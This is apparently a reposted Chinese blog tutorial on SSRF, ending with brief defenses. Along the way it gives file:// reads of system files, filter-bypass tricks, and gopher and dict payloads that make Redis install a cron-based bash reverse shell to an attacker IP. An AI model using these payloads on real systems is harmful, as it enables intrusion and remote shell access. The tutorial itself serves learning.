ssrf实战
一、ssrf原理[*]服务器端请求伪造(SSRF)是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。(利用一个可发起网络请求的服务当作跳板来攻击其他服务)
[*]攻击者能够利用目标帮助攻击者访问其他想要攻击的目标
[*]攻击者要求服务器为他访问URL
https://cdn.nlark.com/yuque/0/2022/png/29626537/1666684315619-f3ae1632-1e05-4e6b-b9d4-847780af9893.png
二、漏洞利用
1.创建一个包含ssrf的页面
将下面的代码文件放到网站根目录,然后命名为ssrf.php
构造payload为ssrf.php?url=www.baidu.com
可以看到跳转到百度页面
https://cdn.nlark.com/yuque/0/2022/png/29626537/1666684852637-38e1f274-79bc-4f6a-a02d-08663d9e38db.png
2.造成ssrf的函数
a、file_get_contents()
这一函数是把 **传入的参数(变量)**写入字符串,当把 传参是内网文件的时候,会先去吧这个文件的内容读出来再写入,导致了任意文件读取,也就是信息泄露的一种。一般这种攻击也与目录遍历相结合。
构造如下payload:
http://10.101.32.228/ssrf.php?url=file://c:\windows\system32\drivers\etc\hosts
https://cdn.nlark.com/yuque/0/2022/png/29626537/1666686730906-26c89c44-2362-4378-b509-4130b967b3a7.png
b、fsockopen()
fsockopen($hostname,$port,$errno,$errstr,$timeout)用于打开一个网络连接或者一个 Unix 套接字连接,初始化一个套接字连接到指定主机(hostname),实现对用户指定 url 数据的获取。该函数会使用 socket 跟服务器建立 tcp 连接,进行传输原始数据。 fsockopen() 将返回一个文件句柄,之后可以被其他文件类函数调用(例如:fgets(),fgetss(),fwrite(),fclose()还有feof())如果调用失败,将返回false。
测试代码:
https://cdn.nlark.com/yuque/0/2022/png/29626537/1666687022043-1d7b2e71-d04f-48b8-be47-272f38ffe065.png
c、curl_exec()
curl_init(url) 函数初始化一个新的会话,返回一个 cURL 句柄,供curl_setopt(),curl_exec()和curl_close()函数使用。
测试代码:
3.相关的协议
a、file协议
paylaod:
file:///etc/password # file:// 之后可以接任意文件
b、dict协议
利用dict协议,dict://ip/info可获取本地redis服务配置信息。
c、gopher 协议
协议格式:URL:gopher://:/_后接TCP数据流
[*]gopher的默认端口是70
[*]如果发起post请求,回车换行需要使用%0d%0a,如果多个参数,参数之间的&也需要进行URL编码
使用gopher发送HTTP数据包:
[*]构造HTTP数据包
[*]URL编码、替换回车换行为%0d%0a
[*]发送gopher协议
[*]如果发送post请求的话有四个参数是必须的
三、攻击内网
1.扫描端口
https://cdn.nlark.com/yuque/0/2022/png/29626537/1666687326706-5fec5252-6fbe-4614-a00e-2070107f0549.png
用burp抓包,然后对端口进行爆破,
https://cdn.nlark.com/yuque/0/2022/png/29626537/1666685369158-5bc3d681-a225-4821-80b5-c1d7f1973ec3.png
https://cdn.nlark.com/yuque/0/2022/png/29626537/1666685388915-1be51c97-709b-4542-8f04-a94e5edbc3f1.png
https://cdn.nlark.com/yuque/0/2022/png/29626537/1666686073795-ce34c24a-953c-4f21-900f-dd73b1abeaca.png
2.利用gopher攻击redis
通过【curl命令】和【gopher协议】伪造post请求
假设一个存在ssrf的页面
<html>
<head>
<title>post</title>
</head>
<body>
<?php
echo $_REQUEST;
?>
</body>
</html>post请求有四个必要参数:
POST /ssrf.php HTTP1.1
Host: 10.101.32.228
User-Agent:curl/7.61.1
Content-Length:7
Content-Type:application/x-www-form-urlencoded
cmd=aaa利用gopher和curl发送数据:通过SSRF漏洞同样可以利用gopher协议对内网系统进行POST请求,不过首先需要查看下【phpinfo】,确认curl是enabled,并且需要确认下当前的curl版本是否支持gopher协议。
curl -v 'gopher://10.101.32.228:80/_POST%20%2fssrf.php%20HTTP/1.1%0D%0AHost:%2010.101.32.228%0D%0AUser-Agent:%20curl/7.61.1%0D%0AContent-Length:7%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Acmd=aaa'查看服务器日志发现确实有post请求
https://cdn.nlark.com/yuque/0/2022/png/29626537/1666751308268-ead1d9e9-4fbf-47ab-925c-b83ecd31d9fc.png
示例环境:
https://cdn.nlark.com/yuque/0/2022/jpeg/29626537/1666752949956-710bd5d3-e4fd-4503-9507-372a7fd3ef63.jpeg既然利用curl+gopher可以伪造数据包,那么就可以把存在ssrf的web服务器当作一个跳板去访问内网,
首先RESP协议:redis服务器和客户端通讯的协议
格式:
*3 #表示有三个命令
$3 #表示这个命令有几个字符
set
$3
ttt
$69
*/1 * * * * bash -i >& /dev/tcp/xxx.xx.xxx.xx/1444 0>&1常用攻击redis命令:
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
//redis-cli查看所有的keys及清空所有的数据将上面的命令转化成为resp协议的格式,然后进行两次编码(因为后面解析gopher要两次解码),之后用gopher协议去攻击
所以可以构造如下的url:
http://192.168.43.123/ssrf.php?url=gopher://192.168.43.129:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/192.168.43.132/3333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0
然后在攻击方开启监听: nv -lvp 3333
或者可以使用dict协议反弹shell
dict://x.x.x.x:6379/<Redis 命令># 清空 key
dict://192.168.43.129:6379/flushall
# 设置要操作的路径为定时任务目录
dict://192.168.43.129:6379/config set dir /var/spool/cron/
# 在定时任务目录下创建 root 的定时任务文件
dict://192.168.43.129:6379/config set dbfilename root
# 写入 Bash 反弹 shell 的 payload
dict://192.168.43.129:6379/set x "\n* * * * * /bin/bash -i >%26 /dev/tcp/x.x.x.x/2333 0>%261\n"
# 保存上述操作
dict://192.168.43.129:6379/save四、绕过与防御
1.绕过
1、访问http://baidu.com@127.0.0.1和http://127.0.0.1一样
2、进制绕过
字符串: 10.0.0.3
二进制: 00001010 . 00000000 . 00000000 . 00000011
十六进制: 0A.00.00.03
整数: 167772163
3、句号绕过:127。0。0。1
4、xip.io绕过
10.0.0.1.xip.io # 解析到 10.0.0.1
www.10.0.0.2.xip.io # www 子域解析到 10.0.0.2
mysite.10.0.0.3.xip.io # mysite 子域解析到 10.0.0.3
foo.bar.10.0.0.4.xip.io # foo.bar 子域解析到 10.0.0.4
10.0.0.1.xip.name # 解析到 10.0.0.1
5、利用[::]绕过localhost2.防御
[*]禁止302跳转,或者每跳转一次都进行校验目的地址是否为内网地址或合法地址。
[*]过滤返回信息,验证远程服务器对请求的返回结果,是否合法。
[*]禁用高危协议,例如:gopher、dict、ftp、file等,只允许http/https
[*]设置URL白名单或者限制内网IP
[*]限制请求的端口为http的常用端口,或者根据业务需要治开放远程调用服务的端口
[*]catch错误信息,做统一错误信息,避免黑客通过错误信息判断端口对应的服务
出处:http://www.cnblogs.com/-xiaopeng1/本文版权归作者和博客园共有,欢迎转载,但必须给出原文链接,并保留此段声明,否则保留追究法律责任的权利。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]